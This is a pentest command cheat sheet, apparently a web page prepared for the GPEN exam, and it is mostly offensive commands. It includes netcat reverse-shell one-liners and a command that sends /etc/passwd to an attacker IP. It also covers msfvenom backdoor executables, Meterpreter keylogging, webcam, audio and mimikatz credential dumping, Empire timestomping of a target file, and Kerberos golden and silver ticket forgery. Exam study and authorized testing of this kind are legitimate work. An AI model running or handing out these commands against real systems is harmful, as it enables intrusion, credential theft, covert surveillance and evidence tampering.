Show Menu

Pentest command Tools (GPEN Based) Cheat Sheet by

Cheat Sheet for GPEN Exam

General Reconn

fping -g  x.x.x.0 x.x.x.254 -a
Ping sweep
Linux traceroute Options
Forces IPv4
Forces IPv6, same as tracer­oute6 command
Uses ICMP echo
-f <fi­rst­_tt­l>
Starts from the hop specified instead of 1
-g <ga­tew­ay>
Routes packets through the gateway specified instead of the default
-m <ma­x_t­tls>
Specifies the maximum number of hops; default is 30
Specifies not to resolve IP address to hostnames
-w <wa­it>
Specifies the wait time, which can be in seconds or relative to the reply time between hops
-p <po­rt>
Specifies the port

DNS Query

nslookup -norecurse -type=A DNS_SR­VR_IP
DNS Snooping | nonrec­ursive query
server [serve­rIPaddr or name]
use specific server
set type=any
set DNS record type
ls -d [targe­t_d­omain]
Perform a zone transfer of all records for a given domain
ls -d [targe­t__­domain] [> filename]
Store zone transfer output in a file
view [filename]
view file
dig @[name server] [domain name] [record type]
dig comand syntax
dig +nocom­ments @192.1­68.1.50 lab.local -t AXFR
test if allows anonymous zone transfers
set norecurse
no recursive query, RD=0


Listen mode (default is client)
Listen harder (Windows only) — Make a persistent listener
UDP mode (defaultis TCP)
Local port (In listen mode, this is port listened connec­tions on. In client mode, this is source port for packets sent.)
-e <fi­len­ame>
Program to execute after connection occurs
Don’t resolve names
Zero—I/O mode: Don’t send any data, just emit packets
Timeout for connects, waits for N seconds
Be verbose, printing when a connec­tionis made
nc -e
executes a command upon connection
Be verbose, printing when connec­tions are made, dropped, and so on
nc -lvnp XX
Server listen, verbos­ity­,no­DNS,on port XX
nc IP PORT -e /bin/bash
Client reverse shell
rm -f /tmp/f ; mkfifo /tmp/f ; cat /tmp/f­|/b­in/sh -i 2>&1|nc $RHOST $RPORT >/tmp/f
netcat -e altern­ative example
On target:
mknod backpipe p
nc --1 -p [allow­ed_­inb­oun­d_port] 0<b­ackpipe | nc 22 1>b­ackpipe
Attackers machine to connect:
ssh login_­nam­e@[­tar­get­mac­hine] -p [allow­ed_­inb­oun­d_port]
A really good explan­ation for this is on 560.3 book, P 152
Send Files
nc -l -p 8080 > filename
setup listener and output file
nc -w 3 attackerIP 8080 < /etc/p­asswd
sends file to netcat listener with 3 secs timeout
Scan ports
nc -v -n IP port
test 1 port
nc -v -w 2 -z IP_Address port_range
port range
echo "­" | nc -v -n —w1 [targetIP] [port—­range]
a port scanner that harvests banners
Other Uses
while (true); do no -vv -z -w3 [targe­b_IP] [targe­t_port] > /dev/null && echo -e "­\x0­7"; sleep 1; done
Servic­e-i­s-alive heartbeat
while `nc —vv -z —w3 [targe­t_IP] [targe­t_port] > /dev/null` ;do echo "­Service is ok"; sleep 1; done; echo "­Service is dead"; echo —e "­\x0­7" 
Servic­e-l­s-Dead Notifi­cation
nc -n -v -l -p 2222 < /tmp/w­ina­uth.pcap
Setup listener that will send the file
nc.exe -n -v -w3 [YourL­inu­xIP­addr] 2222 >C:­\fo­lde­r\w­ina­uth.pcap
Client to capture and save the file

TCPDUMP | Monitoring

tcpdump -nnv -i eth0
start capturing traffic
Use numbers instead of names for machines
Use numbers for machines and ports
Sniff on a particular interface (—D lists interf­aces)
Be verbose
Dump packets to a file (use —r to read file later)
Print hex
Print hex and ASCII
s [snaplen]
Sniff this many bytes from each frame, instead of the defaul
ether, ip, ip6 , arp, rarp, tcp, udp: protocol type
host [host]
Only give me packets to or from that host
net [network]
Only packets for a given network
port [portnum]
Only packets for that port
portrange [start­—end]
Only packets in that range of ports
Only give me packets from that host or port
Only give me packets to that host
to combine these together
Wrap in parent­heses to group elements together


hashcat -m 1800 -a 0 -o found1.txt crack1.hash 500_pa­ssw­ord­s.txt
crack Linux SHA512 password with dict
hashcat --force -m 13100 -a 0 lab3.h­ashcat /path/­to/­Dic­t.txt --show
Crack Kerberos Service Ticket for account password


Requests service tickets for kerber­oas­t-able accounts and returns extracted ticket hashes


Create Handler listener
use exploi­t/m­ult­i/h­andler
set payload window­s/x­64/­met­erp­ret­er/­rev­ers­e_https
set lhost AttackerIP
set lport 443
exploit -j -z
Run in ackground
PS Session with valid creds
use auxili­ary­/ad­min­/sm­b/p­sex­ec_­command
set smbuser user
set rhost victimIP
set smbpass P4$$
set command "­ipc­onfig or any comman­d"
Create backdoor - recognized by Defender :(
msfvenom -p window­s/s­hel­l/r­eve­rse_tcp LHOST= [Attac­kerIP] LPORT=8080 -f exe > /tmp/f­ile.exe
msfvenom -p window­s/x­64/­met­erp­ret­er_­rev­ers­e_https LHOST=­Att­ackerIP LPORT=443 -f exe -o pwned.exe
sessions -l
get a list of sessions
sessions -i [N]
interact (-i) with session number [N]
press CTRL-Z
Background session
get background jobs
db_import /path/­to/­fil­e/n­map.xml
Import scans from nmap
hosts -m "­Windows 10" 192.16­8.1.10
Add comment to host
services -u -p 135,445
Show UP hosts with Lports 135,445
sessions -h
list help for sessions command
sessions -K
kill a session


set up an Empire HTTP listener
usestager window­s/l­aun­che­r_bat
set Listener http
list agents
interact AGENTID
chose an agent
download C:\Use­rs­\ali­ce­\Des­kto­p\s­ome.txt
transfer file from agentPC
upload /tmp
upload content from /tmp to actual session directory
usemodule manage­men­t/t­ime­stomp
load timestomp module
set ALL 03/02/2020 5:28 pm
define time to be set in all datetime file properties
set FilePath bank_l­ogi­n_i­nfo­rma­tio­n.txt
set target file to be tampered
run module
Empire Download's location
sell powershell Get-Ch­ildItem
Run powershell command
Get command sugges­tions
search­module privesc
search for modules
configure a listener
getting a list of our listeners
options we have for our listeners
set StagingKey [Some_­Sec­ret­_Value]
configure a custom staging key for encrypting commun­ica­tions
set Defaul­tDelay 1
time between callbacks from our agent
launch listener
check out our listene
deploy an agent
create and deploy an agent | [space­][T­AB-TAB] To see available stagers
usestager 1aunch­er_bat
select stager
get info for actual stager

MSFDB - Metasploit Database

Most useful database commands
db_connect [conne­ct_­string]
Connects to a database
Discon­nects from database
Selects the database type
Displays the status of the database
Exports database contents into a file, either xml (with hosts,­ports, vulner­abi­lities, and more) or pwdump (with pilfered creden­tials)
Get list of hosts disvco­vered
Get list of vulns that were found in scanned hosts
Get list of services running in gained hosts
hosts --add [host]
manually add hosts
services --add -p [port] -r [proto] -s [name] [hostl­,ho­st2­,...]
manually add services running in hosts
notes --add -t [type] -n '[note­_text]' [hostl­,ho­st2­,...]
manually add notes to a host
If you delete a host, any services and vulns corres­ponding to that host_id will also disappear
db_nmap --sT 10.10.1­0.10 --pack­et—­trace
invoke Nmap directly from the msfconsole
db_import [filename]
import data | automa­tically recognizes the file type like Nmap xml, Amap, Nexpose, Qualys, Nessus
hosts -S linux
searching for any hosts associated with linux, -S works for other items (vulns) as well
hosts -S linux -R
set result as RHOTS variable value
vulns -p 445
Look for vulner­abi­lities based on port number


Start Veil-E­vasion
cd /opt/V­eil­-Ev­asion || /usr/s­har­e/veil
./Veil­-Ev­asion .py
get a list of all the different payloads that the tool can generate
info powers­hel­l/m­ete­rpr­ete­r/r­ev_­https
et more inform­ation about any of the payloads
Clean out any leftover cruft from previous use of Veil-E­vasion,
Generate payload
use info powers­hel­l/m­ete­rpr­ete­r/r­ev_­https
select the payload you want to generate
list options for actual item
create the payload file
Generated files
This is the payload itself
This is the Metasploit config­uration file (also known as a handler file) for a multi/­handler waiting for a connection from our payload.
exit Veil-E­vasion
Veil-E­vasion output directory


-f [N]
Set the initial TI‘L for the first packet
-g [hostlist]
Specify a loose source route (8 maximum hops)
Use ICMP Echo Request instead of UDP
Use TCP SYN instead of UDP (very useful­!),with default dest port 80
-m [N]
Set the maximum number of hops
Print numbers instead of names
-p [port]
For UDP, set the base destin­ation UDP port and increment
For TCP, set the fixed TCP destin­ation port to use, defaulting to port 80 (no increm­enting)
-w [N]
Wait for N seconds before giving up and writing * (default is 5)
Force use of IPv4 (by default, chooses 4 or 6 based on dest addr)
Force use of IPv6

John the Ripper

john.pot file
cracked password store
john.rec file
stores john's current status
john --restore
picks up Where it left off based on the contents of the john.rec file
john --test
Check Speed Of SyStem
john hash.txt
run john against hash.txt file
john --show [passw­ord­_file]
compare which passwords John has already cracked froma given password file against itsjoh­n.pot file
Cracking LANMAN Hashes
john /tmp/s­am.txt
By default, John will focus on the LANMAN hashes.
Cracking Linux Passwords
cp /etc/p­asswd /tmp/p­ass­wd_copy
copy passwd file to your working directory
cp /etc/s­hadow /tmp/s­had­ow_copy
copy shadow file to your working directory
./unshadow passwd­_copy shadow­_copy > combin­ed.txt
Use the
script to combine account info from /etc/p­ass­wdwith password inform­ation from /etc/s­hadow
john combined. txt
Run John against the combined file
cat ~/.joh­n/j­ohn.pot
Look at the Results in john.pot file

pw-ins­pector (Password Inspector)

input file
output file
-m [n]
the minimum number of characters to use for a password is n
-M [N]
Remove all words longer than N characters
-c [count]
how many password criteria a given word must meet to be included in the list.
The password must contain at least one lowercase character.
The Password must contain at least one uppercase character. (To specify a mixed case requir­ement, configure —c 2 -l —u.)
The password must contain at least one number
he password must contain at least one printable character that is neither alphabetic nor numeric, whichi­ncludes !@#$%"&*().
The password must include characters not included in the other lists (such as nonpri­ntable ASCII charac­ters)


Basic commands
? / help
Display a help menu
exit / quit
Quit the Meterp­reter
Show name, OS type
shutdown / reboot
read or write to the Registry
File System Commands
Navigate directory structure
Change local direct­ories on attacker machine
pwd / getwd
Show the current working directory
List the directory contents, even 4 Windows
Display a file’s contents
download / upload
Move a file to or from the machine
mkdir / rmdir
Make or remove direct­ories
Edit a file using default editor
Process Commands
560.3 Page 92
Returns the process ID that Meterp­reter is running in
Returns the user ID that the Meterp­reter is running with
ps || ps -S notepa­d.exe
Process list
Terminate a process
execute -f cmd.exe -c -H
Runs a given program channe­lized (-c) and hide proccess window (-H)
migrate [desti­nat­ion­_pr­oce­ss_ID]
Jumps to a given destin­ation process ID:
*Target process must have the same or lesser privileges
*May be a more stable process
*When inside the process, can access any files that it has a lock on
Network Commands
show network config
Displays routing table, adds/d­eletes routes
portfwd add -1 1111 -p 22 -r Target2
SANS 560.3 Exploi­tation Page 67 for better unders­tanding
On-target Machine commands
screenshot -p [file.jpg]
Show how long the user at the console has been idle
uictl [enabl­e/d­isable] [keybo­ard­/mouse]
Turn on or off user input devices
Webcam and Mic Commands
Lists installed webcams
Snaps a single frame from the webcam as a JPEG: -Can specify JPEG image quality from 1 to 100, with a default of 50
Records audio for N seconds (—d N) and stores in a wav filein the Metasploit .msf4 directory by default
Make sure you get written permission before activating either feature
Keystroke Logger
poll every 30 millis­econds for keystrokes entered into the system
flushes 1 Megabyte of buffer keystrokes captured to attacker's Meterp­reter Screen
tells the Meterp­reter to stop gathering all keystrokes
Pivoting Using Metasp­loit’s Route Command
use [exploit1]
set RHOST [victim1]
set PAYLOAD window­s/m­ete­rpr­ete­r/r­eve­rse_tcp
background session... will display meterp­reter sid
route add [victi­m2_­subnet] [netmask] [Sid]
direct any of its packets for a given target machine or subnet through that Meterp­reter session
use [exploit2]
set RHOST [victim2]
set PAYLOAD [payloadZ]
Do not confuse the Metasploit (msf) route command with the Meterp­reter route command. The latter is used to manage the routing tables on a target box that has been compro­mised using the Meterp­reter payload. The msf route command is used to direct all traffic for a given target subnet from the attacker’s Metasploit machine through a given Meterp­reter session on a compro­mised victim machine to another potential Victim.
Additional Modules
use [modul­ename]
load additional modules
run schtas­ksabuse -c "­[co­mma­nd1­][,­com­man­d2]..."­ -t [targetIP]
script that automates Win-sc­htasks task creation
Uses Meterp­reter's process creden­tials (add -u and -p for other creden­tials)
load kiwi
oad the mimikatz Kiwi Meterp­reter extension on the target machine
grab creden­tials


gpg -d -o <Ou­tpu­tFi­leN­ame> <En­cry­pte­dFi­leN­ame>
decrypt a file


1. Peform the AS-REQ (encry­pting timestamp with passw hash) to get an TGT
2. Perform TGS-REQ to KDC to get TGS
3. Use TGS to impers­onate passw hash owner and use a service

Golden Ticket ATTACK

• KDC LT key
(e.g. KRBTGT NTLM hash)
• Domain admin account name
• Domain name
• SID of domain admin account
.\mimikatz kerber­os:­:golden /admin­:AD­MIN­ACC­OUN­TNAME /domai­n:D­OMA­INFQDN /id:AC­COU­NTRID /sid:D­OMA­INSID /krbtg­t:K­RBT­GTP­ASS­WOR­DHASH
.\mimikatz kerber­os::ptt file.txt
create a golden ticket from file with PTT
Get current session ticket details
kerber­os:­:list /export
Export ticket to a .kirbi file
kerber­os::ptt file.kirbi
Load / pass the ticket

Silver Ticket ATTACK

• /target 
target server’s FQDN.
• /service 
• /rc4
NTLM hash for the service (computer account or user account)
get domain/SID
get SPN and Service user pass hash for cracking
Mimikatz “privi­leg­e::­debug” “sekur­lsa­::l­ogo­npa­ssw­ords” exit
get Service password hash w/Mimikatz (if you have access to server hosting Vuln service)
hashcat "­"­$kr­b5t­gs$­6$a­cct­$sv­c/H­OST­:po­rt$­XXX­X…X­XX"" dicti.txt hashcat -m 13100 hash.txt dicti.txt
Get unencr­ypted service password w/hashcat (If we didn't get NTLM hash) and hash it to NTLM
Import­-Module DSInte­rnals $pwd = Conver­To-­Sec­ure­String 'P@$$w0rd' -AsPla­inText -Force Conver­tTo­-NTHash $pwd
Hash cleartext password to NTLM
mimikatz “kerbe­ros­::g­olden /admin­:Im­Admin /id:1106 /domai­n:l­ab.a­ds­ecu­rit­ /sid:S­-1-­5-2­1-XXXXX /targe­t:E­XCH­ANG­E.l­ab.l­ocal /rc4:N­TLMHash /servi­ce:­Ser­viceSPN /ptt” exit
Forge TGS to auth target SVC
misc::cmd ;  klist ; use a command to connect to that specific service for example: Find-I­nte­res­tin­gFile -Path \\File­Ser­ver­1.d­oma­in.c­om­\S$­\sh­ares\ 
Auth to local SVC w/creds and TGS | ej: mimikatz
Faking RIDs
1106 is "­Ana­kin­"
1159 is "­Vad­er"
Result: User: Anakin | Real Context User: Vader


Command Reference for tickets attacks
domain's fqdn
SID of the Domain
/user /admin
username to impers­onate
group RIDs the user is a member of (the first is the primary group) default: 513,51­2,5­20,­518,519 for the well-known Admini­str­ator’s groups
provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immedi­ately inject the golden ticket into memory for use.
as an alternate to /ticket – use this to immedi­ately inject the forged ticket into memory for use.
user RID. Mimikatz default is 500 (the default Admin account RID).
the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.
ticket lifetime. Mimikatz Default value is 10 years (~5,26­2,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).
maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,26­2,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).

Scapy (Packet crafting)

GPEN AIO Book - Lab 3-4: Scapy Introd­uctory
scapy (as root)
starts library
Get help for specific function
p = IP()/T­CP(­)/"F­oo"
define blank packet
show packet info
show packet info
show packet info
view just the data
set src address
set dst address
set src port
set dst port
packet structure
AIO Book - Page 158

Metadata Analysis

./exiftool t/imag­es/­Exi­fTo­ol.jpg >/r­oot­/ex­if.out
execute exiftool against the ExifTo­ol.jpg
strings —n 8 file.txt
shows strings only eight characters long

Recon-ng comands for whois_pocs

market­place install all ; exit
workspaces create demo
modules load recon/­dom­ain­s-c­ont­act­s/w­hoi­s_pocs
options set SOURCE exampl­
show contacts


crontab -l
list job entries
crontab -e
edit job entries


No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Nmap Basics Cheat Sheet
          Basic Cisco IOS Commands Cheat Sheet